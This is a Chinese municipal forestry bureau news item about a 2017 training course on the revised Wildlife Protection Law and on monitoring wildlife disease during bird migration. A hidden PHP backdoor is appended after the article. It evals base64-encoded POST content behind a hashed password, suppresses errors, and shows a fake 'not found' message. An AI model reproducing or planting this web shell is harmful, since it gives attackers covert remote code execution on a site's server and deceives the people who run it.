工作动态

首页 > 工作动态 >

    市林业局举办2017年度野生动物保护暨疫源疫病监测防控培训班

           8月17日至18日,市林业局举办2017年全市野生动物保护暨疫源疫病监测防控培训班,各县(市、区)分管领导、林业站站长、分管站长及业务技术人员、森林公安主要负责人和盐城人民公园动物园负责人共50多人参加了培训。
      本次培训班邀请了江苏省野保站副站长钟育谦进行了授课,重点对新的《野生动物保护法》修订内容进行了详细释义,并就野生动物保护管理行政许可、规范审批及野生动物疫源疫病监测防控等业务知识做了讲解。此外,市林业局副调研员李尧部署了秋季野保重点工作,并指出,野生动物疫源疫病监测防控是生态安全的屏障,事关社会安全稳定和经济发展。当前,正值候鸟南迁季节,野生动物疫源疫病监测防控工作任务繁重,各级一定要强化大局意识、责任意识、风险意识和忧患意识,切实把疫源疫病监测防控工作摆上日程,确保监测信息上报及时准确。
      此次培训共发放《中华人民共和国野生动物保护法》(最新修订本)、《江苏省野生动物保护管理文件汇编》、《预防禽流感 保护你我它》、《盐城滨海湿地常见鸟类》、《中国常见鸟类小图册》等各种培训资料共3000余份。
      通过此次培训,一是培训学员对《野生动物保护法》的修订内容有了进一步理解和领会,基本掌握了行政许可审批事项的业务流程,为提高全市野生动物保护管理水平起到了促进作用;二是进一步完善监测预警体系建设,更好地发挥基层测报点的作用,为保质保量完成监测预报任务奠定良好的基础。
     

"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>